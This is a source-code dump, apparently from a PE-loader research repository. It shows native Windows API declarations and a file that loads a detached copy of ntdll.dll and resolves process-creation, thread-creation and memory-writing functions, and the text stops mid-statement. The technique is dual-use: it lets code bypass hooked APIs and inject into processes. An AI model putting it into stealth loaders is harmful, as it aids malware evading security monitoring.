NTSYSAPI 3449 | NTSTATUS 3450 | NTAPI 3451 | NtAllocateVirtualMemory ( 3452 | IN HANDLE ProcessHandle, 3453 | IN OUT PVOID *BaseAddress, 3454 | IN ULONG ZeroBits, 3455 | IN OUT PULONG RegionSize, 3456 | IN ULONG AllocationType, 3457 | IN ULONG Protect 3458 | ); 3459 | 3460 | 3461 | NTSYSAPI 3462 | NTSTATUS 3463 | NTAPI 3464 | ZwAllocateVirtualMemory ( 3465 | IN HANDLE ProcessHandle, 3466 | IN OUT PVOID *BaseAddress, 3467 | IN ULONG ZeroBits, 3468 | IN OUT PULONG RegionSize, 3469 | IN ULONG AllocationType, 3470 | IN ULONG Protect 3471 | ); 3472 | 3473 | 3474 | NTSYSAPI 3475 | NTSTATUS 3476 | NTAPI 3477 | NtFreeVirtualMemory ( 3478 | IN HANDLE ProcessHandle, 3479 | IN OUT PVOID *BaseAddress, 3480 | IN OUT PULONG RegionSize, 3481 | IN ULONG FreeType 3482 | ); 3483 | 3484 | 3485 | NTSYSAPI 3486 | NTSTATUS 3487 | NTAPI 3488 | ZwFreeVirtualMemory ( 3489 | IN HANDLE ProcessHandle, 3490 | IN OUT PVOID *BaseAddress, 3491 | IN OUT PULONG RegionSize, 3492 | IN ULONG FreeType 3493 | ); 3494 | 3495 | 3496 | NTSYSAPI 3497 | NTSTATUS 3498 | NTAPI 3499 | NtReadVirtualMemory( 3500 | IN HANDLE ProcessHandle, 3501 | IN PVOID BaseAddress, 3502 | OUT PVOID Buffer, 3503 | IN ULONG NumberOfBytesToRead, 3504 | OUT PULONG NumberOfBytesRead OPTIONAL 3505 | ); 3506 | 3507 | 3508 | NTSYSAPI 3509 | NTSTATUS 3510 | NTAPI 3511 | NtWriteVirtualMemory( 3512 | IN HANDLE ProcessHandle, 3513 | IN PVOID BaseAddress, 3514 | IN PVOID Buffer, 3515 | IN ULONG NumberOfBytesToWrite, 3516 | OUT PULONG NumberOfBytesWritten OPTIONAL 3517 | ); 3518 | 3519 | 3520 | //----------------------------------------------------------------------------- 3521 | // Section functions 3522 | 3523 | typedef enum _SECTION_INHERIT 3524 | { 3525 | ViewShare = 1, 3526 | ViewUnmap = 2 3527 | 3528 | } SECTION_INHERIT; 3529 | 3530 | 3531 | typedef enum _SECTION_INFORMATION_CLASS 3532 | { 3533 | SectionBasicInformation, 3534 | SectionImageInformation 3535 | 3536 | } SECTION_INFORMATION_CLASS, *PSECTION_INFORMATION_CLASS; 3537 | 3538 | 3539 | /*++ 3540 | 3541 | NtCreateSection 3542 | =============== 3543 | 3544 | Creates a section object. 3545 | 3546 | SectionHandle - Points to a variable that will receive the section 3547 | object handle if the call is successful. 3548 | 3549 | DesiredAccess - Specifies the type of access that the caller requires 3550 | to the section object. This parameter can be zero, or any combination 3551 | of the following flags: 3552 | 3553 | SECTION_QUERY - Query access 3554 | SECTION_MAP_WRITE - Can be written when mapped 3555 | SECTION_MAP_READ - Can be read when mapped 3556 | SECTION_MAP_EXECUTE - Can be executed when mapped 3557 | SECTION_EXTEND_SIZE - Extend access 3558 | SECTION_ALL_ACCESS - All of the preceding + 3559 | STANDARD_RIGHTS_REQUIRED 3560 | 3561 | ObjectAttributes - Points to a structure that specifies the object s attributes. 3562 | OBJ_OPENLINK is not a valid attribute for a section object. 3563 | 3564 | MaximumSize - Optionally points to a variable that specifies the size, 3565 | in bytes, of the section. If FileHandle is zero, the size must be 3566 | specified; otherwise, it can be defaulted from the size of the file 3567 | referred to by FileHandle. 3568 | 3569 | SectionPageProtection - The protection desired for the pages 3570 | of the section when the section is mapped. This parameter can take 3571 | one of the following values: 3572 | 3573 | PAGE_READONLY 3574 | PAGE_READWRITE 3575 | PAGE_WRITECOPY 3576 | PAGE_EXECUTE 3577 | PAGE_EXECUTE_READ 3578 | PAGE_EXECUTE_READWRITE 3579 | PAGE_EXECUTE_WRITECOPY 3580 | 3581 | AllocationAttributes - The attributes for the section. This parameter must 3582 | be a combination of the following values: 3583 | 3584 | SEC_BASED 0x00200000 // Map section at same address in each process 3585 | SEC_NO_CHANGE 0x00400000 // Disable changes to protection of pages 3586 | SEC_IMAGE 0x01000000 // Map section as an image 3587 | SEC_VLM 0x02000000 // Map section in VLM region 3588 | SEC_RESERVE 0x04000000 // Reserve without allocating pagefile storage 3589 | SEC_COMMIT 0x08000000 // Commit pages; the default behavior 3590 | SEC_NOCACHE 0x10000000 // Mark pages as non-cacheable 3591 | 3592 | FileHandle - Identifies the file from which to create the section object. 3593 | The file must be opened with an access mode compatible with the protection 3594 | flags specified by the Protect parameter. If FileHandle is zero, 3595 | the function creates a section object of the specified size backed 3596 | by the paging file rather than by a named file in the file system. 3597 | 3598 | --*/ 3599 | 3600 | 3601 | NTSYSAPI 3602 | NTSTATUS 3603 | NTAPI 3604 | NtCreateSection( 3605 | OUT PHANDLE SectionHandle, 3606 | IN ACCESS_MASK DesiredAccess, 3607 | IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, 3608 | IN PLARGE_INTEGER MaximumSize OPTIONAL, 3609 | IN ULONG SectionPageProtection, 3610 | IN ULONG AllocationAttributes, 3611 | IN HANDLE FileHandle OPTIONAL 3612 | ); 3613 | 3614 | 3615 | NTSYSAPI 3616 | NTSTATUS 3617 | NTAPI 3618 | ZwCreateSection( 3619 | OUT PHANDLE SectionHandle, 3620 | IN ACCESS_MASK DesiredAccess, 3621 | IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, 3622 | IN PLARGE_INTEGER MaximumSize OPTIONAL, 3623 | IN ULONG SectionPageProtection, 3624 | IN ULONG AllocationAttributes, 3625 | IN HANDLE FileHandle OPTIONAL 3626 | ); 3627 | 3628 | 3629 | NTSYSAPI 3630 | NTSTATUS 3631 | NTAPI 3632 | NtOpenSection ( 3633 | OUT PHANDLE SectionHandle, 3634 | IN ACCESS_MASK DesiredAccess, 3635 | IN POBJECT_ATTRIBUTES ObjectAttributes 3636 | ); 3637 | 3638 | 3639 | NTSYSAPI 3640 | NTSTATUS 3641 | NTAPI 3642 | ZwOpenSection ( 3643 | OUT PHANDLE SectionHandle, 3644 | IN ACCESS_MASK DesiredAccess, 3645 | IN POBJECT_ATTRIBUTES ObjectAttributes 3646 | ); 3647 | 3648 | 3649 | NTSYSAPI 3650 | NTSTATUS 3651 | NTAPI 3652 | NtMapViewOfSection ( 3653 | IN HANDLE SectionHandle, 3654 | IN HANDLE ProcessHandle, 3655 | IN OUT PVOID *BaseAddress, 3656 | IN ULONG ZeroBits, 3657 | IN ULONG CommitSize, 3658 | IN OUT PLARGE_INTEGER SectionOffset OPTIONAL, 3659 | IN OUT PULONG ViewSize, 3660 | IN SECTION_INHERIT InheritDisposition, 3661 | IN ULONG AllocationType, 3662 | IN ULONG Protect 3663 | ); 3664 | 3665 | 3666 | NTSYSAPI 3667 | NTSTATUS 3668 | NTAPI 3669 | ZwMapViewOfSection ( 3670 | IN HANDLE SectionHandle, 3671 | IN HANDLE ProcessHandle, 3672 | IN OUT PVOID *BaseAddress, 3673 | IN ULONG ZeroBits, 3674 | IN ULONG CommitSize, 3675 | IN OUT PLARGE_INTEGER SectionOffset OPTIONAL, 3676 | IN OUT PULONG ViewSize, 3677 | IN SECTION_INHERIT InheritDisposition, 3678 | IN ULONG AllocationType, 3679 | IN ULONG Protect 3680 | ); 3681 | 3682 | 3683 | NTSYSAPI 3684 | NTSTATUS 3685 | NTAPI 3686 | NtUnmapViewOfSection ( 3687 | IN HANDLE ProcessHandle, 3688 | IN PVOID BaseAddress 3689 | ); 3690 | 3691 | 3692 | NTSYSAPI 3693 | NTSTATUS 3694 | NTAPI 3695 | ZwUnmapViewOfSection ( 3696 | IN HANDLE ProcessHandle, 3697 | IN PVOID BaseAddress 3698 | ); 3699 | 3700 | 3701 | NTSYSAPI 3702 | NTSTATUS 3703 | NTAPI 3704 | NtExtendSection ( 3705 | IN HANDLE SectionHandle, 3706 | IN OUT PLARGE_INTEGER SectionSize 3707 | ); 3708 | 3709 | 3710 | NTSYSAPI 3711 | NTSTATUS 3712 | NTAPI 3713 | ZwExtendSection ( 3714 | IN HANDLE SectionHandle, 3715 | IN OUT PLARGE_INTEGER SectionSize 3716 | ); 3717 | 3718 | 3719 | NTSYSAPI 3720 | NTSTATUS 3721 | NTAPI 3722 | NtQuerySection ( 3723 | IN HANDLE SectionHandle, 3724 | IN SECTION_INFORMATION_CLASS SectionInformationClass, 3725 | OUT PVOID SectionInformation, 3726 | IN ULONG Length, 3727 | OUT PULONG ResultLength OPTIONAL 3728 | ); 3729 | 3730 | 3731 | NTSYSAPI 3732 | NTSTATUS 3733 | NTAPI 3734 | ZwQuerySection ( 3735 | IN HANDLE SectionHandle, 3736 | IN SECTION_INFORMATION_CLASS SectionInformationClass, 3737 | OUT PVOID SectionInformation, 3738 | IN ULONG Length, 3739 | OUT PULONG ResultLength OPTIONAL 3740 | ); 3741 | 3742 | 3743 | //----------------------------------------------------------------------------- 3744 | // Synchronization 3745 | 3746 | // 3747 | // Wait type 3748 | // 3749 | 3750 | typedef enum _WAIT_TYPE { 3751 | WaitAll, 3752 | WaitAny 3753 | } WAIT_TYPE; 3754 | 3755 | 3756 | NTSYSAPI 3757 | NTSTATUS 3758 | NTAPI 3759 | NtWaitForSingleObject ( 3760 | IN HANDLE Handle, 3761 | IN BOOLEAN Alertable, 3762 | IN PLARGE_INTEGER Timeout OPTIONAL 3763 | ); 3764 | 3765 | 3766 | NTSYSAPI 3767 | NTSTATUS 3768 | NTAPI 3769 | ZwWaitForSingleObject ( 3770 | IN HANDLE Handle, 3771 | IN BOOLEAN Alertable, 3772 | IN PLARGE_INTEGER Timeout OPTIONAL 3773 | ); 3774 | 3775 | 3776 | NTSYSAPI 3777 | NTSTATUS 3778 | NTAPI 3779 | NtWaitForMultipleObjects ( 3780 | IN ULONG Count, 3781 | IN HANDLE Handle[], 3782 | IN WAIT_TYPE WaitType, 3783 | IN BOOLEAN Alertable, 3784 | IN PLARGE_INTEGER Timeout OPTIONAL 3785 | ); 3786 | 3787 | 3788 | NTSYSAPI 3789 | NTSTATUS 3790 | NTAPI 3791 | ZwWaitForMultipleObjects ( 3792 | IN ULONG Count, 3793 | IN HANDLE Handle[], 3794 | IN WAIT_TYPE WaitType, 3795 | IN BOOLEAN Alertable, 3796 | IN PLARGE_INTEGER Timeout OPTIONAL 3797 | ); 3798 | 3799 | 3800 | //----------------------------------------------------------------------------- 3801 | // Event support 3802 | 3803 | typedef enum _EVENT_INFORMATION_CLASS { 3804 | EventBasicInformation // = 0 3805 | } EVENT_INFORMATION_CLASS; 3806 | 3807 | typedef struct _EVENT_BASIC_INFORMATION { 3808 | EVENT_TYPE EventType; 3809 | LONG EventState; 3810 | } EVENT_BASIC_INFORMATION, *PEVENT_BASIC_INFORMATION; 3811 | 3812 | // 3813 | // Event handling routines 3814 | // 3815 | 3816 | 3817 | NTSYSAPI 3818 | NTSTATUS 3819 | NTAPI 3820 | NtCreateEvent ( 3821 | OUT PHANDLE EventHandle, 3822 | IN ACCESS_MASK DesiredAccess, 3823 | IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, 3824 | IN EVENT_TYPE EventType, 3825 | IN BOOLEAN InitialState 3826 | ); 3827 | 3828 | 3829 | NTSYSAPI 3830 | NTSTATUS 3831 | NTAPI 3832 | ZwCreateEvent ( 3833 | OUT PHANDLE EventHandle, 3834 | IN ACCESS_MASK DesiredAccess, 3835 | IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, 3836 | IN EVENT_TYPE EventType, 3837 | IN BOOLEAN InitialState 3838 | ); 3839 | 3840 | 3841 | NTSYSAPI 3842 | NTSTATUS 3843 | NTAPI 3844 | NtClearEvent ( 3845 | IN HANDLE Handle 3846 | ); 3847 | 3848 | 3849 | NTSYSAPI 3850 | NTSTATUS 3851 | NTAPI 3852 | ZwClearEvent ( 3853 | IN HANDLE Handle 3854 | ); 3855 | 3856 | 3857 | NTSYSAPI 3858 | NTSTATUS 3859 | NTAPI 3860 | NtPulseEvent ( 3861 | IN HANDLE Handle, 3862 | OUT PLONG PreviousState OPTIONAL 3863 | ); 3864 | 3865 | 3866 | NTSYSAPI 3867 | NTSTATUS 3868 | NTAPI 3869 | ZwPulseEvent ( 3870 | IN HANDLE Handle, 3871 | OUT PLONG PreviousState OPTIONAL 3872 | ); 3873 | 3874 | 3875 | NTSYSAPI 3876 | NTSTATUS 3877 | NTAPI 3878 | NtResetEvent ( 3879 | IN HANDLE Handle, 3880 | OUT PLONG PreviousState OPTIONAL 3881 | ); 3882 | 3883 | 3884 | NTSYSAPI 3885 | NTSTATUS 3886 | NTAPI 3887 | ZwResetEvent ( 3888 | IN HANDLE Handle, 3889 | OUT PLONG PreviousState OPTIONAL 3890 | ); 3891 | 3892 | 3893 | NTSYSAPI 3894 | NTSTATUS 3895 | NTAPI 3896 | NtSetEvent ( 3897 | IN HANDLE Handle, 3898 | OUT PLONG PreviousState OPTIONAL 3899 | ); 3900 | 3901 | 3902 | NTSYSAPI 3903 | NTSTATUS 3904 | NTAPI 3905 | ZwSetEvent ( 3906 | IN HANDLE Handle, 3907 | OUT PLONG PreviousState OPTIONAL 3908 | ); 3909 | 3910 | 3911 | NTSYSAPI 3912 | NTSTATUS 3913 | NTAPI 3914 | NtOpenEvent ( 3915 | OUT PHANDLE EventHandle, 3916 | IN ACCESS_MASK DesiredAccess, 3917 | IN POBJECT_ATTRIBUTES ObjectAttributes 3918 | ); 3919 | 3920 | 3921 | NTSYSAPI 3922 | NTSTATUS 3923 | NTAPI 3924 | ZwOpenEvent ( 3925 | OUT PHANDLE EventHandle, 3926 | IN ACCESS_MASK DesiredAccess, 3927 | IN POBJECT_ATTRIBUTES ObjectAttributes 3928 | ); 3929 | 3930 | 3931 | NTSYSAPI 3932 | NTSTATUS 3933 | NTAPI 3934 | NtQueryEvent ( 3935 | IN HANDLE EventHandle, 3936 | IN EVENT_INFORMATION_CLASS EventInfoClass, 3937 | OUT PVOID EventInfo, 3938 | IN ULONG Length, 3939 | OUT PULONG ResultLength OPTIONAL 3940 | ); 3941 | 3942 | 3943 | NTSYSAPI 3944 | NTSTATUS 3945 | NTAPI 3946 | ZwQueryEvent ( 3947 | IN HANDLE EventHandle, 3948 | IN EVENT_INFORMATION_CLASS EventInfoClass, 3949 | OUT PVOID EventInfo, 3950 | IN ULONG Length, 3951 | OUT PULONG ResultLength OPTIONAL 3952 | ); 3953 | 3954 | 3955 | //----------------------------------------------------------------------------- 3956 | // Security descriptor functions 3957 | 3958 | NTSYSAPI 3959 | NTSTATUS 3960 | NTAPI 3961 | RtlCreateSecurityDescriptor ( 3962 | IN PSECURITY_DESCRIPTOR SecurityDescriptor, 3963 | IN ULONG Revision 3964 | ); 3965 | 3966 | 3967 | NTSYSAPI 3968 | NTSTATUS 3969 | NTAPI 3970 | RtlSetDaclSecurityDescriptor( 3971 | IN PSECURITY_DESCRIPTOR SecurityDescriptor, 3972 | IN BOOLEAN DaclPresent, 3973 | IN PACL Dacl OPTIONAL, 3974 | IN BOOLEAN DaclDefaulted OPTIONAL 3975 | ); 3976 | 3977 | 3978 | NTSYSAPI 3979 | NTSTATUS 3980 | NTAPI 3981 | RtlSetOwnerSecurityDescriptor ( 3982 | IN PSECURITY_DESCRIPTOR SecurityDescriptor, 3983 | IN PSID Owner OPTIONAL, 3984 | IN BOOLEAN OwnerDefaulted OPTIONAL 3985 | ); 3986 | 3987 | 3988 | NTSYSAPI 3989 | NTSTATUS 3990 | NTAPI 3991 | RtlAllocateAndInitializeSid( 3992 | IN PSID_IDENTIFIER_AUTHORITY IdentifierAuthority, 3993 | IN UCHAR SubAuthorityCount, 3994 | IN ULONG SubAuthority0, 3995 | IN ULONG SubAuthority1, 3996 | IN ULONG SubAuthority2, 3997 | IN ULONG SubAuthority3, 3998 | IN ULONG SubAuthority4, 3999 | IN ULONG SubAuthority5, 4000 | IN ULONG SubAuthority6, 4001 | IN ULONG SubAuthority7, 4002 | OUT PSID *Sid 4003 | ); 4004 | 4005 | 4006 | NTSYSAPI 4007 | ULONG 4008 | NTAPI 4009 | RtlLengthSid ( 4010 | IN PSID Sid 4011 | ); 4012 | 4013 | 4014 | NTSYSAPI 4015 | BOOLEAN 4016 | NTAPI 4017 | RtlEqualSid ( 4018 | IN PSID Sid1, 4019 | IN PSID Sid2 4020 | ); 4021 | 4022 | 4023 | NTSYSAPI 4024 | PVOID 4025 | NTAPI 4026 | RtlFreeSid( 4027 | IN PSID Sid 4028 | ); 4029 | 4030 | 4031 | NTSYSAPI 4032 | NTSTATUS 4033 | NTAPI 4034 | RtlCreateAcl( 4035 | IN PACL Acl, 4036 | IN ULONG AclLength, 4037 | IN ULONG AclRevision 4038 | ); 4039 | 4040 | 4041 | NTSYSAPI 4042 | NTSTATUS 4043 | NTAPI 4044 | RtlAddAccessAllowedAce( 4045 | IN OUT PACL Acl, 4046 | IN ULONG AceRevision, 4047 | IN ACCESS_MASK AccessMask, 4048 | IN PSID Sid 4049 | ); 4050 | 4051 | 4052 | NTSYSAPI 4053 | NTSTATUS 4054 | NTAPI 4055 | RtlAddAccessAllowedAceEx( 4056 | IN OUT PACL Acl, 4057 | IN ULONG AceRevision, 4058 | IN ULONG AceFlags, 4059 | IN ULONG AccessMask, 4060 | IN PSID Sid 4061 | ); 4062 | 4063 | //----------------------------------------------------------------------------- 4064 | // Token functions 4065 | 4066 | NTSYSAPI 4067 | NTSTATUS 4068 | NTAPI 4069 | NtOpenProcessToken( 4070 | IN HANDLE ProcessHandle, 4071 | IN ACCESS_MASK DesiredAccess, 4072 | OUT PHANDLE TokenHandle 4073 | ); 4074 | 4075 | 4076 | NTSYSAPI 4077 | NTSTATUS 4078 | NTAPI 4079 | NtOpenThreadToken( 4080 | IN HANDLE ThreadHandle, 4081 | IN ACCESS_MASK DesiredAccess, 4082 | IN BOOLEAN OpenAsSelf, 4083 | OUT PHANDLE TokenHandle 4084 | ); 4085 | 4086 | 4087 | NTSYSAPI 4088 | NTSTATUS 4089 | NTAPI 4090 | NtQueryInformationToken( 4091 | IN HANDLE TokenHandle, 4092 | IN TOKEN_INFORMATION_CLASS TokenInformationClass, 4093 | OUT PVOID TokenInformation, 4094 | IN ULONG TokenInformationLength, 4095 | OUT PULONG ReturnLength 4096 | ); 4097 | 4098 | 4099 | NTSYSAPI 4100 | NTSTATUS 4101 | NTAPI 4102 | NtSetInformationToken( 4103 | IN HANDLE TokenHandle, 4104 | IN TOKEN_INFORMATION_CLASS TokenInformationClass, 4105 | IN PVOID TokenInformation, 4106 | IN ULONG TokenInformationLength 4107 | ); 4108 | 4109 | 4110 | NTSYSAPI 4111 | NTSTATUS 4112 | NTAPI 4113 | NtAdjustPrivilegesToken( 4114 | IN HANDLE TokenHandle, 4115 | IN BOOLEAN DisableAllPrivileges, 4116 | IN PTOKEN_PRIVILEGES NewState OPTIONAL, 4117 | IN ULONG BufferLength OPTIONAL, 4118 | IN PTOKEN_PRIVILEGES PreviousState OPTIONAL, 4119 | OUT PULONG ReturnLength 4120 | ); 4121 | 4122 | 4123 | NTSYSAPI 4124 | NTSTATUS 4125 | NTAPI 4126 | NtDuplicateToken( 4127 | IN HANDLE ExistingTokenHandle, 4128 | IN ACCESS_MASK DesiredAccess, 4129 | IN POBJECT_ATTRIBUTES ObjectAttributes, 4130 | IN BOOLEAN EffectiveOnly, 4131 | IN TOKEN_TYPE TokenType, 4132 | OUT PHANDLE NewTokenHandle 4133 | ); 4134 | 4135 | 4136 | NTSYSAPI 4137 | NTSTATUS 4138 | NTAPI 4139 | NtCompareTokens( 4140 | IN HANDLE FirstTokenHandle, 4141 | IN HANDLE SecondTokenHandle, 4142 | OUT PBOOLEAN IdenticalTokens 4143 | ); 4144 | 4145 | 4146 | //----------------------------------------------------------------------------- 4147 | // Symbolic links 4148 | 4149 | // 4150 | // Object Manager Symbolic Link Specific Access Rights. 4151 | // 4152 | 4153 | #ifndef SYMBOLIC_LINK_QUERY 4154 | #define SYMBOLIC_LINK_QUERY (0x0001) 4155 | #define SYMBOLIC_LINK_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | 0x1) 4156 | #endif 4157 | 4158 | NTSYSAPI 4159 | NTSTATUS 4160 | NTAPI 4161 | NtOpenSymbolicLinkObject ( 4162 | OUT PHANDLE SymbolicLinkHandle, 4163 | IN ACCESS_MASK DesiredAccess, 4164 | IN POBJECT_ATTRIBUTES ObjectAttributes 4165 | ); 4166 | 4167 | 4168 | NTSYSAPI 4169 | NTSTATUS 4170 | NTAPI 4171 | NtQuerySymbolicLinkObject ( 4172 | IN HANDLE SymbolicLinkHandle, 4173 | OUT PUNICODE_STRING NameString, 4174 | OUT PULONG ResultLength OPTIONAL 4175 | ); 4176 | 4177 | //----------------------------------------------------------------------------- 4178 | // Loader functions 4179 | 4180 | NTSYSAPI 4181 | NTSTATUS 4182 | NTAPI 4183 | LdrGetDllHandle( 4184 | IN PWSTR DllPath OPTIONAL, 4185 | IN PULONG DllCharacteristics OPTIONAL, 4186 | IN PUNICODE_STRING DllName, 4187 | OUT PVOID * DllHandle 4188 | ); 4189 | 4190 | 4191 | NTSYSAPI 4192 | NTSTATUS 4193 | NTAPI 4194 | LdrGetProcedureAddress( 4195 | IN PVOID DllHandle, 4196 | IN PANSI_STRING ProcedureName OPTIONAL, 4197 | IN ULONG ProcedureNumber OPTIONAL, 4198 | OUT PVOID *ProcedureAddress 4199 | ); 4200 | 4201 | 4202 | NTSYSAPI 4203 | NTSTATUS 4204 | NTAPI 4205 | LdrLoadDll( 4206 | IN PWSTR DllPath OPTIONAL, 4207 | IN PULONG DllCharacteristics OPTIONAL, 4208 | IN PUNICODE_STRING DllName, 4209 | OUT PVOID *DllHandle 4210 | ); 4211 | 4212 | NTSYSAPI 4213 | NTSTATUS 4214 | NTAPI 4215 | LdrFindEntryForAddress( 4216 | IN PVOID Address, 4217 | OUT PLDR_DATA_TABLE_ENTRY *Module 4218 | ); 4219 | 4220 | NTSYSAPI 4221 | VOID 4222 | NTAPI 4223 | RtlGetCallersAddress( 4224 | OUT PVOID *CallersAddress, 4225 | OUT PVOID *CallersCaller 4226 | ); 4227 | 4228 | //----------------------------------------------------------------------------- 4229 | // Functions dealing with NTSTATUS and Win32 error 4230 | 4231 | NTSYSAPI 4232 | ULONG 4233 | NTAPI 4234 | RtlNtStatusToDosError( 4235 | NTSTATUS Status 4236 | ); 4237 | 4238 | 4239 | NTSYSAPI 4240 | ULONG 4241 | NTAPI 4242 | RtlNtStatusToDosErrorNoTeb( 4243 | NTSTATUS Status 4244 | ); 4245 | 4246 | 4247 | NTSYSAPI 4248 | NTSTATUS 4249 | NTAPI 4250 | RtlGetLastNtStatus( 4251 | ); 4252 | 4253 | 4254 | NTSYSAPI 4255 | ULONG 4256 | NTAPI 4257 | RtlGetLastWin32Error( 4258 | ); 4259 | 4260 | 4261 | NTSYSAPI 4262 | VOID 4263 | NTAPI 4264 | RtlSetLastWin32Error( 4265 | ULONG WinError 4266 | ); 4267 | 4268 | 4269 | NTSYSAPI 4270 | VOID 4271 | NTAPI 4272 | RtlSetLastWin32ErrorAndNtStatusFromNtStatus( 4273 | NTSTATUS Status 4274 | ); 4275 | 4276 | 4277 | //----------------------------------------------------------------------------- 4278 | // I/O functions 4279 | 4280 | 4281 | NTSYSAPI 4282 | NTSTATUS 4283 | NTAPI 4284 | NtDisplayString( 4285 | IN PUNICODE_STRING String 4286 | ); 4287 | 4288 | 4289 | #ifdef __cplusplus 4290 | } // extern "C" 4291 | #endif 4292 | 4293 | #endif // __NTDLL_H__ 4294 | -------------------------------------------------------------------------------- /basic_ldr/ntdll_detached.cpp: -------------------------------------------------------------------------------- 1 | #include "ntdll_detached.h" 2 | #include "peconv.h" 3 | 4 | NTSTATUS (NTAPI *ntdll_NtCreateProcessEx) 5 | ( 6 | OUT PHANDLE ProcessHandle, 7 | IN ACCESS_MASK DesiredAccess, 8 | IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, 9 | IN HANDLE ParentProcess, 10 | IN ULONG Flags, 11 | IN HANDLE SectionHandle OPTIONAL, 12 | IN HANDLE DebugPort OPTIONAL, 13 | IN HANDLE ExceptionPort OPTIONAL, 14 | IN BOOLEAN InJob 15 | ) = NULL; 16 | 17 | NTSTATUS (NTAPI *ntdll_RtlCreateProcessParametersEx)( 18 | _Out_ PRTL_USER_PROCESS_PARAMETERS *pProcessParameters, 19 | _In_ PUNICODE_STRING ImagePathName, 20 | _In_opt_ PUNICODE_STRING DllPath, 21 | _In_opt_ PUNICODE_STRING CurrentDirectory, 22 | _In_opt_ PUNICODE_STRING CommandLine, 23 | _In_opt_ PVOID Environment, 24 | _In_opt_ PUNICODE_STRING WindowTitle, 25 | _In_opt_ PUNICODE_STRING DesktopInfo, 26 | _In_opt_ PUNICODE_STRING ShellInfo, 27 | _In_opt_ PUNICODE_STRING RuntimeData, 28 | _In_ ULONG Flags // pass RTL_USER_PROC_PARAMS_NORMALIZED to keep parameters normalized 29 | ) = NULL; 30 | 31 | NTSTATUS (NTAPI *ntdll_NtCreateThreadEx) ( 32 | OUT PHANDLE ThreadHandle, 33 | IN ACCESS_MASK DesiredAccess, 34 | IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, 35 | IN HANDLE ProcessHandle, 36 | IN LPTHREAD_START_ROUTINE StartRoutine, 37 | IN PVOID Argument OPTIONAL, 38 | IN ULONG CreateFlags, 39 | IN ULONG_PTR ZeroBits, 40 | IN SIZE_T StackSize OPTIONAL, 41 | IN SIZE_T MaximumStackSize OPTIONAL, 42 | IN PVOID AttributeList OPTIONAL 43 | ) = NULL; 44 | 45 | NTSTATUS (NTAPI *ntdll_NtAllocateVirtualMemory)( 46 | _In_ HANDLE ProcessHandle, 47 | _Inout_ PVOID *BaseAddress, 48 | _In_ ULONG_PTR ZeroBits, 49 | _Inout_ PSIZE_T RegionSize, 50 | _In_ ULONG AllocationType, 51 | _In_ ULONG Protect 52 | ) = NULL; 53 | 54 | NTSTATUS (NTAPI *ntdll_NtWriteVirtualMemory)( 55 | IN HANDLE ProcessHandle, 56 | IN PVOID BaseAddress, 57 | IN PVOID Buffer, 58 | IN ULONG NumberOfBytesToWrite, 59 | OUT PULONG NumberOfBytesWritten OPTIONAL 60 | ) = NULL; 61 | 62 | NTSTATUS (NTAPI *ntdll_NtCreateSection) ( 63 | OUT PHANDLE SectionHandle, 64 | IN ACCESS_MASK DesiredAccess, 65 | IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, 66 | IN PLARGE_INTEGER MaximumSize OPTIONAL, 67 | IN ULONG SectionPageProtection, 68 | IN ULONG AllocationAttributes, 69 | IN HANDLE FileHandle OPTIONAL 70 | ) = NULL; 71 | 72 | HMODULE load_ntdll(size_t &v_size) 73 | { 74 | CHAR ntdllPath[MAX_PATH]; 75 | ExpandEnvironmentStrings("%SystemRoot%\\system32\\ntdll.dll", ntdllPath, MAX_PATH); 76 | 77 | HMODULE ntdll_module = (HMODULE) peconv::load_pe_module(ntdllPath, v_size, true, true); 78 | return ntdll_module; 79 | } 80 | 81 | bool init_ntdll_func(HMODULE lib) 82 | { 83 | if (lib == nullptr) { 84 | return false; 85 | } 86 | FARPROC proc = peconv::get_exported_func(lib, "NtCreateProcessEx"); 87 | if (proc == nullptr) { 88 | return false; 89 | } 90 | ntdll_NtCreateProcessEx = (NTSTATUS (NTAPI *)( 91 | PHANDLE, 92 | ACCESS_MASK, 93 | POBJECT_ATTRIBUTES, 94 | HANDLE, 95 | ULONG, 96 | HANDLE, 97 | HANDLE, 98 | HANDLE, 99 | BOOLEAN 100 | )) proc; 101 | 102 | proc = peconv::get_exported_func(lib, "RtlCreateProcessParametersEx"); 103 | if (proc == nullptr) { 104 | return false; 105 | } 106 | ntdll_RtlCreateProcessParametersEx = (NTSTATUS (NTAPI *)( 107 | PRTL_USER_PROCESS_PARAMETERS*, 108 | PUNICODE_STRING, 109 | PUNICODE_STRING, 110 | PUNICODE_STRING, 111 | PUNICODE_STRING, 112 | PVOID, 113 | PUNICODE_STRING, 114 | PUNICODE_STRING, 115 | PUNICODE_STRING, 116 | PUNICODE_STRING, 117 | ULONG 118 | )) proc; 119 | 120 | proc = peconv::get_exported_func(lib, "NtCreateThreadEx"); 121 | if (proc == nullptr) { 122 | return false; 123 | } 124 | ntdll_NtCreateThreadEx = (NTSTATUS (NTAPI *)( 125 | PHANDLE, 126 | ACCESS_MASK, 127 | POBJECT_ATTRIBUTES, 128 | HANDLE, 129 | LPTHREAD_START_ROUTINE, 130 | PVOID, 131 | ULONG, 132 | ULONG_PTR, 133 | SIZE_T, 134 | SIZE_T, 135 | PVOID 136 | )) proc; 137 | 138 | proc = peconv::get_exported_func(lib, "NtAllocateVirtualMemory"); 139 | if (proc == nullptr) { 140 | return false; 141 | } 142 | ntdll_NtAllocateVirtualMemory = (NTSTATUS (NTAPI *)( 143 | HANDLE, 144 | PVOID*, 145 | ULONG_PTR, 146 | PSIZE_T, 147 | ULONG, 148 | ULONG 149 | )) proc; 150 | 151 | proc = peconv::get_exported_func(lib, "NtWriteVirtualMemory"); 152 | if (proc == nullptr) { 153 | return false; 154 | } 155 | ntdll_NtWriteVirtualMemory = (NTSTATUS (NTAPI *)( 156 | HANDLE, //ProcessHandle 157 | PVOID, // BaseAddress 158 | PVOID, //Buffer 159 | ULONG, //NumberOfBytesToWrite 160 | PULONG //NumberOfBytesWritten OPTIONAL 161 | )) proc; 162 | 163 | proc = peconv::get_exported_func(lib, "NtCreateSection"); 164 | if (proc == nullptr) { 165 | return false; 166 | } 167 | ntdll_NtCreateSection = (NTSTATUS (NTAPI *)( 168 | PHANDLE , 169 | ACCESS_MASK, 170 | 